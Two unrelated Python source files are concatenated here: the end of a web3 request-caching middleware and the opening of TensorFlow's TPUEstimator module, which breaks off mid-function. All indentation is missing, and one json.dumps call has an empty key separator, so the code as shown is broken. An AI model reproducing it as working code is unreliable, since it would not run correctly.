target_bytecode = web3.eth.get_code(address)
if not is_cacheable_bytecode(web3, target_bytecode):
return False
return True
def _new_filter(w3: Web3) -> Any:
# returns a filter if the client is connected and supports filtering
try:
block_filter = w3.eth.filter("latest")
block_filter.get_new_entries()
return block_filter
except (AttributeError, ValueError):
return None
class RequestCachingMiddleware(BrownieMiddlewareABC):
"""
Web3 middleware for request caching.
"""
def __init__(self, w3: Web3) -> None:
self.w3 = w3
self.table_key = f"chain{CONFIG.active_network['chainid']}"
self.cur = Cursor(_get_data_folder().joinpath("cache.db"))
self.cur.execute(f"CREATE TABLE IF NOT EXISTS {self.table_key} (method, params, result)")
latest = w3.eth.get_block("latest")
self.last_block = latest.hash
self.last_block_seen = latest.timestamp
self.last_request = 0.0
self.block_cache: OrderedDict = OrderedDict()
self.block_filter = w3.eth.filter("latest")
self.lock = threading.Lock()
self.event = threading.Event()
self.is_killed = False
threading.Thread(target=self.block_filter_loop, daemon=True).start()
@classmethod
def get_layer(cls, w3: Web3, network_type: str) -> Optional[int]:
if network_type != "live":
# do not cache on development chains
return None
try:
latest = w3.eth.get_block("latest")
except Exception:
return None
if latest.timestamp - w3.eth.get_block(latest.number - 50).timestamp < 250:
# do not cache on chains with an average block time of less than 5 seconds
return None
if _new_filter(w3) is None:
# do not cache if we cannot create a filter for new blocks
return None
return 0
@property
def time_since(self) -> float:
return time.time() - self.last_request
def block_filter_loop(self) -> None:
while not self.is_killed:
# if the last RPC request was > 60 seconds ago, reduce the rate of updates.
# we eventually settle at one query per minute after 10 minutes of no requests.
with self.lock:
if self.time_since > 60:
self.block_cache.clear()
self.event.clear()
if self.time_since > 60:
self.event.wait(min(self.time_since / 10, 60))
# query the filter for new blocks
with self.lock:
try:
new_blocks = self.block_filter.get_new_entries()
except (AttributeError, ValueError):
# web3 has disconnected, or the filter has expired from inactivity
# some public nodes allow a filter initially, but block it several seconds later
block_filter = _new_filter(self.w3)
if block_filter is None:
return
self.block_filter = block_filter
continue
if new_blocks:
self.block_cache[new_blocks[-1]] = {}
self.last_block = new_blocks[-1]
self.last_block_seen = time.time()
if len(self.block_cache) > 5:
old_key = list(self.block_cache)[0]
del self.block_cache[old_key]
if new_blocks and self.time_since < 15:
# if this update found a new block and we've been querying
# frequently, we can wait a few seconds before the next update
time.sleep(5)
elif time.time() - self.last_block_seen < 15:
# if it's been less than 15 seconds since the last block, wait 2 seconds
time.sleep(2)
else:
# if it's been more than 15 seconds, only wait 1 second
time.sleep(1)
def process_request(self, make_request: Callable, method: str, params: List) -> Dict:
if method in (
# caching any of these means we die of recursion death so let's not do that
"eth_getFilterChanges",
"eth_newBlockFilter",
"eth_uninstallFilter",
# used to check connectivity
"web3_clientVersion",
# caching these causes weirdness with transaction replacement
"eth_sendTransaction",
"eth_sendRawTransaction",
"eth_sign",
"eth_signTransaction",
):
return make_request(method, params)
# try to return a cached value
param_str = json.dumps(params, separators=(",", ""), default=str)
# check if the value is available within the long-term cache
if method in LONGTERM_CACHE:
row = self.cur.fetchone(
f"SELECT result FROM {self.table_key} WHERE method=? AND params=?",
(method, param_str),
)
if row:
data = row[0]
if isinstance(data, bytes):
data = HexBytes(data)
return {"id": "cache", "jsonrpc": "2.0", "result": data}
with self.lock:
self.last_request = time.time()
self.event.set()
try:
return self.block_cache[self.last_block][method][param_str]
except KeyError:
pass
# cached value is unavailable, make a request and cache the result
with self.lock:
response = make_request(method, params)
self.block_cache.setdefault(self.last_block, {}).setdefault(method, {})
self.block_cache[self.last_block][method][param_str] = response
# check if the value can be added to long-term cache
if "result" in response and method in LONGTERM_CACHE:
result = response["result"]
if LONGTERM_CACHE[method](self.w3, result):
if isinstance(result, (dict, list, tuple)):
result = json.dumps(response, separators=(",", ""), default=str)
self.cur.insert(self.table_key, method, param_str, result)
return response
def uninstall(self) -> None:
self.is_killed = True
self.block_cache.clear()
if self.w3.isConnected():
self.w3.eth.uninstallFilter(self.block_filter.filter_id)
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import copy
import enum
import math
import os
import signal
import sys
import threading
import time
import tensorflow as tf
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf.tpu import compilation_result_pb2 as tpu_compilation_result
from tensorflow.python.client import session as tf_session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.distribute.cluster_resolver import tpu_cluster_resolver
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import batch_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import control_flow_util
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.tpu import functional as tpu_functional
from tensorflow.python.tpu import preempted_hook
from tensorflow.python.tpu import session_support
from tensorflow.python.tpu import tensor_tracer
from tensorflow.python.tpu import tpu
from tensorflow.python.tpu import tpu_embedding_gradient
from tensorflow.python.tpu import tpu_feed
from tensorflow.python.tpu import tpu_function
from tensorflow.python.tpu import training_loop
from tensorflow.python.tpu.ops import tpu_ops
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import estimator_export
from tensorflow_estimator.python.estimator import estimator as estimator_lib
from tensorflow_estimator.python.estimator import model_fn as model_fn_lib
from tensorflow_estimator.python.estimator.export import export_output as export_output_lib
from tensorflow_estimator.python.estimator.tpu import _tpu_estimator_embedding
from tensorflow_estimator.python.estimator.tpu import error_handling
from tensorflow_estimator.python.estimator.tpu import iteration_count_estimator
from tensorflow_estimator.python.estimator.tpu import tpu_config
from tensorflow_estimator.python.estimator.tpu import tpu_context
from tensorflow_estimator.python.estimator.tpu import util as util_lib
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdagradParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import AdamParameters # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import EmbeddingConfigSpec # pylint: disable=unused-import
from tensorflow_estimator.python.estimator.tpu._tpu_estimator_embedding import StochasticGradientDescentParameters # pylint: disable=unused-import
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.
_TPU_ESTIMATOR = 'tpu_estimator'
_ITERATIONS_PER_LOOP_VAR = 'iterations_per_loop'
_BATCH_SIZE_KEY = 'batch_size'
_CTX_KEY = 'context'
_USE_TPU_KEY = 'use_tpu'
_CROSS_REPLICA_SUM_OP = 'CrossReplicaSum'
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = '_tpu_enqueue_ops'
_TPU_TRAIN_OP = '_tpu_train_op'
_INFERENCE_ON_TPU_MODE = '_inference_on_tpu'
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR = '_key_when_predictions_is_a_tensor'
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE = 1
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP = 5
_TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY = '_concatenated_small_features'
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
# Track the adoption of TPUEstimator
_tpu_estimator_gauge = monitoring.BoolGauge(
'/tensorflow/api/tpu_estimator',
'Whether the program uses tpu estimator or not.')
if ops.get_to_proto_function('{}_{}'.format(_TPU_ESTIMATOR,
_ITERATIONS_PER_LOOP_VAR)) is None:
ops.register_proto_function(
'{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn) # pylint: disable=protected-access
def _is_iterable(obj):
"""A Python 2 and 3 compatible util to check whether `obj` is iterable."""
try:
iter(obj)
return True
except TypeError:
return False
class CatchInvalidHostcallFunctions(control_flow_ops.XLAControlFlowContext):
def AddOp(self, op):
if op.type in [
'AudioSummary', 'AudioSummaryV2', 'HistogramSummary', 'ImageSummary',
'MergeSummary', 'ScalarSummary', 'TensorSummary', 'TensorSummaryV2'
]:
raise ValueError('Please use tf.contrib.summary instead of tf.summary '
'inside of host_calls.')
def _create_global_step(graph):
graph = graph or tf.compat.v1.get_default_graph()
if tf.compat.v1.train.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return tf.compat.v1.get_variable(
tf.compat.v1.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=tf.dtypes.int64,
initializer=tf.compat.v1.initializers.zeros(),
trainable=False,
use_resource=True,
collections=[
tf.compat.v1.GraphKeys.GLOBAL_VARIABLES,
tf.compat.v1.GraphKeys.GLOBAL_STEP
])
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather then a constant, is to allow
TPUEstimator adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following value before each TPU training.
- 1-th TPU execution: iterations_per_loop = 4
- 2-th TPU execution: iterations_per_loop = 4
- 3-th TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multi iterations_per_loop variables were found.
"""
graph = tf.compat.v1.get_default_graph()
collection_name = '{}_{}'.format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError('Multiple iterations_per_loop_var in collection.')
with ops.colocate_with(tf.compat.v1.train.get_global_step()):
with tf.compat.v1.variable_scope(
_TPU_ESTIMATOR, reuse=tf.compat.v1.AUTO_REUSE):
return tf.compat.v1.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=tf.compat.v1.initializers.zeros(),
shape=[],
dtype=tf.dtypes.int32,
trainable=False,
collections=[collection_name, tf.compat.v1.GraphKeys.LOCAL_VARIABLES],
use_resource=True)
def _sync_variables_ops(ctx):
"""Create varriables synchronization ops.
Gets the variables back from TPU nodes. This means the variables updated
by TPU will now be *synced* to host memory.
In BROADCAST mode, we skip this sync since the variables are ususally too
big to transmit via RPC.
Args:
ctx: A `_InternalTPUContext` instance with mode.
Returns:
A list of sync ops.
"""
if not ctx.is_input_broadcast_with_iterators():
return [
tf.debugging.check_numerics(v.read_value(),
'Gradient for %s is NaN' % v.name).op
for v in tf.compat.v1.trainable_variables()
]
else:
return [tf.no_op()]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU system
before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = evaluation._get_or_create_eval_step() # pylint: disable=protected-access
# Estimator evaluate increases 1 by default. So, we increase the difference.
return tf.compat.v1.assign_add(
eval_step,
tf.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True)
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class PeriodicLogger(object):
def __init__(self, seconds):
self._log_every_n_seconds = seconds
self._last_log_time = 0
def log(self, msg, *args, **kw):
if time.time() - self._last_log_time > self._log_every_n_seconds:
self._last_log_time = time.time()
tf.compat.v1.logging.info(msg, *args, **kw)
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
@estimator_export(v1=['estimator.tpu.TPUEstimatorSpec'])
class TPUEstimatorSpec(model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
`tf.estimator.Estimator`. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must have be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function is
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with `tf.contrib.summary.create_file_writer`.
"""
def __new__(cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None):
"""Creates a validated `TPUEstimatorSpec` instance."""
cls._host_calls = {}
if eval_metrics is not None:
cls._host_calls['eval_metrics'] = eval_metrics
if host_call is not None:
cls._host_calls['host_call'] = host_call
_OutfeedHostCall.validate(cls._host_calls)
training_hooks = tuple(training_hooks or [])
evaluation_hooks = tuple(evaluation_hooks or [])
prediction_hooks = tuple(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, tf.compat.v1.train.SessionRunHook):
raise TypeError(
'All hooks must be SessionRunHook instances, given: {}'.format(
hook))
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(self._host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret['eval_metrics']
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret['host_call'])]
loss = self.loss
if tensor_tracer.TensorTracer.is_enabled() \
and self.train_op is not None:
tt = tensor_tracer.TensorTracer()
loss = tt.trace_cpu(tf.compat.v1.get_default_graph(), loss, self.train_op)
hooks = tuple(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks)
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
tf.compat.v1.logging.debug('%s read iterations %s', self._name,
iterations)
if iterations == _SIGNAL.STOP:
tf.compat.v1.logging.info('%s received shutdown signal, stopping.',
self._name)
return
yield iterations
def join(self):
tf.compat.v1.logging.info('Shutting down %s thread.', self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(tf.compat.v1.train.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
master=None,
session_config=None,
tpu_init_ops=None,
outfeed_every_n_steps=1):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._master = master
self._session_config = session_config
self._init_ops = list(tpu_init_ops or [])
if ctx.embedding_config is None:
self._embedding_layer_config = None
else:
self._embedding_layer_config = (
ctx.embedding_config.tpu_embedding.config_proto)
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs)
self._tpu_compile_op = tpu_compile_op
# When using model parallelism, the TPU is pre-initialized at startup to
# fetch mesh information. We skip re-initializing it here for
# MeshTensorFlow since it places variables on TPU directly. Reinitialize tpu
# is causing the variable corruption since the previous allocated memory
# might be overwritten for other purpose.
if (ctx.model_parallelism_enabled and
(ctx.config.tpu_config.per_host_input_for_training is
tpu_config.InputPipelineConfig.BROADCAST)):
self._should_initialize_tpu = False
else:
self._should_initialize_tpu = True
self._outfeed_every_n_steps = outfeed_every_n_steps
def begin(self):
tf.compat.v1.logging.info('TPU job name %s', self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
if self._should_initialize_tpu:
self._finalize_ops = [
tf.compat.v1.tpu.shutdown_system(job=self._master_job)
]
else:
self._finalize_ops = []
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
tf.compat.v1.logging.info('Starting infeed thread controller.')
if self._initial_infeed_sleep_secs:
tf.compat.v1.logging.info('Infeed thread sleeping for %d seconds.',
self._initial_infeed_sleep_secs)
time.sleep(self._initial_infeed_sleep_secs)
tf.compat.v1.logging.info('Infeed thread starting after sleep')
with self._rendezvous.catch_errors(source='infeed', session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
tf.compat.v1.logging.debug('Infeed enqueue for iteration (%d, %d)',
count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
tf.compat.v1.logging.info('Infeed thread finished, shutting down.')
def _run_outfeed(self, queue_ctx, session):
tf.compat.v1.logging.info('Starting outfeed thread controller.')
status_logger = PeriodicLogger(seconds=60)
with self._rendezvous.catch_errors(source='outfeed', session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
step_counter = 0
for i in xrange(steps):
tf.compat.v1.logging.debug('Outfeed dequeue for iteration (%d, %d)',
count, i)
if step_counter % self._outfeed_every_n_steps == 0:
session.run(self._dequeue_ops)
step_counter += 1
status_logger.log('Outfeed finished for iteration (%d, %d)', count, i)
tf.compat.v1.logging.info('Outfeed thread finished, shutting down.')
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def _assertCompilationSucceeded(self, result, coord):
proto = tpu_compilation_result.CompilationResultProto()
proto.ParseFromString(result)
if proto.status_error_message:
tf.compat.v1.logging.error('Compilation failed: {}'.format(
proto.status_error_message))
coord.request_stop()
else:
tf.compat.v1.logging.info('Compilation succeeded')
def after_create_session(self, session, coord):
if self._should_initialize_tpu:
tf.compat.v1.logging.info('Init TPU system')
start = time.time()
with tf.Graph().as_default():
with tf.compat.v1.Session(
self._master, config=self._session_config) as sess:
sess.run(
tf.compat.v1.tpu.initialize_system(
job=self._master_job,
embedding_config=self._embedding_layer_config))
tf.compat.v1.logging.info('Initialized TPU in %d seconds',
time.time() - start)
session.run(
self._init_ops,
options=config_pb2.RunOptions(timeout_in_ms=30 * 60 * 1000))
if os.environ.get('TPU_SPLIT_COMPILE_AND_EXECUTE', '') == '1':
tf.compat.v1.logging.info(
'Compiling user program: this may take a while...')
self._assertCompilationSucceeded(session.run(self._tpu_compile_op), coord)
self._infeed_controller = self._create_infeed_controller(
name='InfeedController', target=self._run_infeed, args=(session,))
self._outfeed_controller = _OpQueueContext(
name='OutfeedController', target=self._run_outfeed, args=(session,))
# Enable the worker watchdog to terminate workers on coordinator exit.
watchdog_timeout = int(os.environ.get('TF_TPU_WATCHDOG_TIMEOUT', '0'))
if watchdog_timeout > 0:
session_support.start_worker_watchdog(
session, shutdown_timeout=watchdog_timeout)
def before_run(self, run_context):
iterations = run_context.session.run(self._iterations_per_loop_var)
tf.compat.v1.logging.info('Enqueue next (%d) batch(es) of data to infeed.',
iterations)
self._infeed_controller.send_next_batch_signal(iterations)
tf.compat.v1.logging.info(
'Dequeue next (%d) batch(es) of data from outfeed.', iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
tf.compat.v1.logging.info('Stop infeed thread controller')
self._infeed_controller.join()
self._rendezvous.record_done('infeed')
tf.compat.v1.logging.info('Stop output thread controller')
self._outfeed_controller.join()
self._rendezvous.record_done('outfeed')
tf.compat.v1.logging.info('Shutdown TPU system.')
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self,
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op,
rendezvous=None,
master=None,
session_config=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
tpu_compile_op=tpu_compile_op,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
master=master,
session_config=session_config)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(tf.compat.v1.train.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
following differences for TPU training:
1. This hook sets the variable for `iterations_per_loop`, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
If the `iterations_per_loop` value is specified as time in seconds, the
number of iterations per `Session.run` will be estimated automatically
based on per iteration runtime.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self,
iterations_per_loop_counter,
num_steps=None,
final_step=None):
"""Initializes a `TPUStopAtStepHook`.
Args:
iterations_per_loop_counter: A namedtuple of [`value',`unit`] that
represents the number of 'iterations count' or 'time in seconds' to run
optimizer per loop, based on the `unit` specified, `count` or `seconds`
respectively.
num_steps: Number of steps to execute.
final_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and final_step is None:
raise ValueError('One of `num_steps` or `final_step` must be specified.')
if num_steps is not None and final_step is not None:
raise ValueError(
'Only one of `num_steps` or `final_step` can be specified.')
self._iterations_per_loop_counter = iterations_per_loop_counter
if self._iterations_per_loop_counter.unit not in ['seconds', 'count']:
raise ValueError('Only `count` or `seconds` are accepted as the '
'`iterations_per_loop_counter.unit')
self._num_steps = num_steps
self._final_step = final_step
self._next_iteration_count = 1
self._iteration_count_estimator = None
if self._iterations_per_loop_counter.unit == 'seconds':
self._iteration_count_estimator = (
iteration_count_estimator.IterationCountEstimator())
self._start_time = time.time()
def _next_iterations(self, global_step, final_step):
"""Computes the next iterations count.
The next iterations count is computed by choosing the smaller of the
remaining step count (`final_step` - `global_step`) and the estimated
iterations count returned by the estimator.
Args:
global_step: The current step.
final_step: Step after which to stop.
Returns:
The number of iterations count to run per loop.
"""
remaining_steps = final_step - global_step
if self._iteration_count_estimator is not None:
estimated_iterations = self._iteration_count_estimator.get(
self._iterations_per_loop_counter.value)
else:
estimated_iterations = self._iterations_per_loop_counter.value
self._next_iteration_count = min(remaining_steps, estimated_iterations)
return self._next_iteration_count
def begin(self):
"""Initializes variables.
Initializes the global step and iterations per loop variables.
Raises:
RuntimeError: An error occurred if global step variable does not exist.
"""
self._global_step_tensor = tf.compat.v1.train.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError('Global step should be created.')
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
"""Computes and updates the first time iterations count.
The iterations are computed by choosing the smaller of the (`final step` -
`global step`), and the initial estimated iterations returned by the
estimator (by default is 1).
Args:
session: A TensorFlow Session that has been created.
coord: A Coordinator object which keeps track of all threads.
"""
global_step = session.run(self._global_step_tensor)
if self._final_step is None:
self._final_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(iterations, session=session)
def before_run(self, run_context):
"""Reset the timer."""
if self._iteration_count_estimator is not None:
self._start_time = time.time()
def after_run(self, run_context, run_values):
"""Computes the next iterations per loop value or terminates.
Computes the elapsed time to run the last optimizer loop and if the
`IterationCountEstimator` is used, records the elapsed time and iterations
count. If the final step count has been reached, terminates. Otherwise,
computes and updates the number of iterations to run the optimizer per loop.
Args:
run_context: A `SessionRunContext` object.
run_values: A SessionRunValues object.
"""
if self._iteration_count_estimator is not None:
elapsed_time = time.time() - self._start_time
tf.compat.v1.logging.info('ElapsedTime: %.3f', elapsed_time)
self._iteration_count_estimator.update(elapsed_time,
self._next_iteration_count)
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._final_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._final_step)
self._iterations_per_loop_var.load(
iterations, session=run_context.session)
class _SetEvalIterationsHook(tf.compat.v1.train.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(tf.compat.v1.train.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for prediction model. But it makes the
# TPUInfeedOutfeedSessionHook prints nice message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return tf.compat.v1.train.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
